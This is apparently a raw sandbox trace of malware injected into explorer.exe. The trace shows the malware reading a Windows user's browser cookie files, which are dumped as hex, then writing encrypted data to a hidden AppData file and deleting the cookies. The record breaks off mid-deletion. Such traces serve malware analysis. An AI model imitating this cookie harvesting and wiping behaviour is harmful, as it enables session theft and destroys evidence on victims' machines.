File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988740093
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988741101
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt Offset: none Length: 204 Value: 53 52 43 48 44 0A 4D 53 3D 31 37 38 33 35 38 30 26 44 3D 31 37 38 33 35 35 32 26 41 46 3D 4E 4F 46 4F 52 4D 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 38 32 37 36 36 30 38 30 0A 33 30 32 39 39 38 39 35 0A 32 30 35 38 32 30 35 35 36 38 0A 33 30 31 35 33 30 34 32 0A 2A 0A success or wait 1988741208
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988741930
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988742962
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt Offset: none Length: 291 Value: 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A 53 52 43 48 44 0A success or wait 1988743069
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988743805
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988744857
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt Offset: none Length: 69 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 34 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1988744963
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988745577
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988746885
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt Offset: none Length: 68 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 32 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 30 38 37 30 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1988746991
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988747647
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988748973
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt Offset: none Length: 67 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 35 36 34 30 33 34 38 31 36 0A 33 30 31 34 34 37 35 34 0A 32 37 33 34 38 31 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 1988749091
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988749700
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988750121
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt Offset: none Length: 67 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 37 35 34 37 37 33 33 37 36 0A 33 30 31 35 33 36 34 34 0A 32 34 35 33 38 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A success or wait 1988750226
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988750831
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988751847
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt Offset: none Length: 83 Value: 50 4F 50 55 50 43 48 45 43 4B 0A 31 33 30 32 33 36 35 36 33 31 36 36 38 0A 63 68 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 38 38 0A 34 39 31 32 31 31 31 33 36 0A 33 30 31 34 34 32 30 39 0A 34 30 38 31 32 38 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1988751953
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988752643
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988753670
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt Offset: none Length: 122 Value: 69 64 0A 63 38 32 63 64 65 37 33 37 30 30 30 30 65 31 7C 7C 74 3D 31 33 30 36 31 36 30 34 33 35 7C 65 74 3D 37 33 30 7C 63 73 3D 79 67 31 65 38 31 65 2D 0A 64 6F 75 62 6C 65 63 6C 69 63 6B 2E 6E 65 74 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 35 32 37 36 36 30 38 30 0A 33 30 32 39 39 38 39 35 0A success or wait 1988753777
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988754409
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988754831
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt Offset: none Length: 88 Value: 69 30 30 0A 30 31 37 62 34 64 61 30 32 33 39 36 65 62 35 31 30 30 30 36 0A 69 76 77 62 6F 78 2E 64 65 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 36 35 36 30 35 35 30 34 0A 33 30 32 31 37 35 37 36 0A 32 36 39 34 34 39 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 1988754936
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988755559
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988756572
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt Offset: none Length: 99 Value: 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 33 34 36 39 33 37 36 33 32 0A 33 30 31 34 34 30 30 38 0A 2A 0A success or wait 1988756678
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988757307
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988758323
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt Offset: none Length: 100 Value: 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 32 35 34 31 33 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A success or wait 1988758429
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988759053
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988760103
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt Offset: none Length: 108 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 64 34 62 32 32 37 62 34 35 61 38 36 34 61 63 39 38 65 33 36 61 39 34 63 64 61 39 64 64 36 35 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 34 30 34 34 37 31 34 39 32 38 0A 33 30 31 success or wait 1988760222
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988760846
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988761926
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt Offset: none Length: 108 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 62 30 37 65 34 37 39 62 30 37 66 36 34 65 62 30 39 66 62 62 65 64 36 66 38 66 62 31 36 66 64 33 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 35 34 31 38 34 31 36 30 30 0A 33 30 31 success or wait 1988762031
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988762696
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988763124
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt Offset: none Length: 108 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 39 35 61 30 63 63 36 61 31 63 39 38 34 39 64 33 61 65 30 32 31 35 37 34 31 33 62 35 38 65 36 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 31 37 31 30 34 34 37 35 32 0A 33 30 31 success or wait 1988763230
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988763910
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988764943
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt Offset: none Length: 455 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 36 64 61 34 34 66 64 61 33 33 65 61 34 61 32 39 38 34 65 66 64 30 66 33 34 66 32 30 38 34 35 35 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 34 30 34 39 35 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 1988765050
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988765908
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988766335
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt Offset: none Length: 387 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 34 64 33 30 63 39 34 63 62 30 62 35 34 62 31 35 62 36 30 65 35 39 37 38 33 62 35 32 32 64 38 62 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 35 35 37 34 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A success or wait 1988766441
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988767254
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988768288
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt Offset: none Length: 457 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 38 35 62 63 63 31 63 34 31 37 65 31 34 34 63 62 61 33 61 62 39 62 65 65 62 61 36 62 62 35 32 32 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 32 31 34 37 39 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A success or wait 1988768394
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988769228
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988770252
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt Offset: none Length: 690 Value: 46 43 30 30 0A 46 42 3D 0A 72 61 64 2E 6D 73 6E 2E 63 6F 6D 2F 0A 39 32 31 36 0A 33 38 30 32 31 31 32 30 30 30 0A 33 30 32 39 39 38 37 35 0A 32 33 39 33 38 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A 46 43 30 31 0A 46 42 3D 0A 72 61 64 2E 6D 73 6E 2E 63 6F 6D 2F 0A 39 32 31 36 0A 33 38 30 32 success or wait 1988770359
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988771924
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988772361
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt Offset: none Length: 115 Value: 55 49 44 0A 32 39 30 36 32 66 37 32 2D 39 35 2E 31 30 30 2E 32 34 39 2E 31 33 30 2D 31 33 30 32 33 34 30 35 30 36 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 34 30 31 38 39 36 37 30 34 0A 33 30 32 39 31 30 30 31 0A 32 36 36 30 35 39 31 success or wait 1988772467
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988772829
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988774014
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt Offset: none Length: 113 Value: 55 49 44 0A 31 61 37 62 62 64 63 38 2D 32 31 32 2E 32 34 33 2E 31 35 32 2E 31 36 30 2D 31 33 30 32 32 37 39 32 33 30 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 37 37 32 35 32 37 33 36 0A 33 30 32 39 30 38 35 39 0A 33 32 37 37 31 37 36 33 success or wait 1988774121
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988774936
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988775373
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt Offset: none Length: 112 Value: 55 49 44 0A 62 39 32 34 35 38 31 2D 36 35 2E 31 39 39 2E 36 33 2E 32 35 2D 31 33 30 36 31 35 38 37 34 37 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 33 32 37 36 36 30 38 30 0A 33 30 32 39 39 38 39 35 0A 32 30 30 31 34 38 35 35 36 38 success or wait 1988775479
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988776108
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988777129
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt Offset: none Length: 90 Value: 69 30 30 0A 37 35 34 39 34 64 39 66 33 34 33 64 32 64 62 36 30 30 30 31 0A 77 65 6D 66 62 6F 78 2E 63 68 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 38 31 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 38 30 36 35 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1988777236
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988777862
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988778935
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt Offset: none Length: 111 Value: 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 34 45 46 44 37 36 44 38 33 37 43 33 34 42 31 43 39 37 44 44 42 30 38 41 36 44 46 37 30 44 45 43 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 35 33 36 0A 33 38 35 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 39 38 31 35 34 39 32 38 0A success or wait 1988779042
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988779705
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988780760
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt Offset: none Length: 117 Value: 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 42 42 35 44 31 42 30 35 36 35 30 34 34 41 45 43 42 37 45 44 41 35 35 38 37 30 44 39 39 38 39 34 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 36 32 36 33 35 32 36 34 0A 33 30 32 39 39 38 39 31 0A 32 33 35 38 35 success or wait 1988780867
System info queried Type: CurrentTimeZoneInformation success or wait 1988782402
Mutant created Name: \BaseNamedObjects\Global\{C5C44599-7D04-EAB2-185B-81F8EE8A3A3D} success or wait 1988783177
Privilege adjusted Privilege: Security On or off: on success or wait 1988785156
File created Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 1988786910
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1988787689
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and read Type: commit Baseaddress: 2B50000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 1988790271
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and read Type: commit Baseaddress: 2B50000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 1988791747
Section loaded Path: \KnownDlls\rsaenh.dll Access: write and read and execute Type: unknown Baseaddress: 2B50000 Size: 208896 Protection: readonly Mapped to pid: own pid object name not found 1989151045
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and write and read and execute Type: image Baseaddress: 68000000 Size: 221184 Protection: read write Mapped to pid: own pid success or wait 1989159788
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and read Type: commit Baseaddress: 2B50000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 1989177670
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1989410696
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1989410801
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1989410895
File write Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei Offset: none Length: 5 Value: 3E C9 07 4F 00 success or wait 1989410992
File write Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei Offset: none Length: 2623 Value: A7 7C 90 C9 22 56 2F F9 40 3C 90 C5 A3 70 CA 24 B8 36 1D E6 A0 E4 98 0D 1E 3A B9 C1 17 8A C8 0D CD FE 7A B8 8C 5C 4E 10 3D 0D AD B6 E5 FE 11 67 49 E5 F2 78 E5 CA B0 59 41 BA 45 99 4C 71 1F 90 E6 53 C5 E3 2B 6A F6 BD 62 D6 0A EA DC 25 05 3B DA 17 2A 03 31 83 0F F4 3B 88 3D 11 62 59 0A 78 3A FC B6 80 success or wait 1989412571
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1989416410
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989419513
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt success or wait 1989419862
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989420304
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt success or wait 1989420648
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989421263
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt success or wait 1989421623
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989422101
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt success or wait 1989422442
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989423033
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt success or wait 1989423373
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989423814
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt success or wait 1989424207
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989424803
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt success or wait 1989425491
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989425906
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt success or wait 1989426246
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989426869
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt success or wait 1989427211
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989427655
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt success or wait 1989428345
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989428945
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt success or wait 1989429286
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989429729
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt success or wait 1989430068
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989430665
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt success or wait 1989431007
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989431481
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt success or wait 1989431822
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989432423
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt success or wait 1989432763
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989433205
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt success or wait 1989433561
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989434161
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt success or wait 1989434519
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989434961
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt success or wait 1989435301
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989435899
